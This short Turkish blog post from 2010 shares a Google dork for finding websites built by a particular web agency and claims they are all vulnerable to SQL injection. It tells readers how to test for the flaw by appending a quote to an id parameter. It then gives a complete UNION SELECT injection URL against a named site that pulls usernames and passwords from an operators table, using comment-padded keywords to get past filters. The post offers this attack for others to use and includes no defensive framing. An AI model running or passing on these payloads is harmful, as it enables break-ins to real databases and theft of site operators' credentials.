19 Şubat 2010 Cuma

Google dorkları sql injection

Selam arkadaşlar...
google dork olarak : Designed by BURSA AJANS   <----- bunu aratın ve çıkan sitelerin herhangi bir sayfasinde in degerine 'a ekleyin mesela  medya.php?id=1'a gibi  full Sql injection açıgı var.. sitelerde. 


ben biranesine denk geldim sizlede paylaşmak istedim..


http://www.oytas-yildiz.com/medya.php?id=31+and+1=2+/**/UniOn/**/SeLeCT/**/1,/**/2,concat(User,0x20,Pass),/**/4,/**/5,/**/6,/**/7,/**/8/**/+from+/**/+operatorler/**/--

Hiç yorum yok :

Yorum Gönder